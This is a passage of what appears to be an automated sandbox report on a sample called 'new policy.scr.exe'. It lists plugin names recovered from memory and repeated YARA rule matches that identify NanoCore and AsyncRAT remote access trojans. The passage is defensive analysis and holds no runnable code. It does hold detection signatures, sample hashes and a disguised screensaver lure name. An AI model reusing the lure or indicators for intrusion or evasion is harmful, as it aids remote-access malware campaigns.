Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.0000000004268000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCoreClientPlugin.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2870782033.000000000798E000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.0000000004281000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNAudio.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2859613130.0000000005C30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNAudio.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFileBrowserClient.dllT vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2870061029.0000000007978000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2831215910.0000000001528000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs new policy.scr.exe
Source: new policy.scr.exe	Binary or memory string: OriginalFilenameOwjefxd.exe0 vs new policy.scr.exe

Uses 32bit PE files

Source: new policy.scr.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
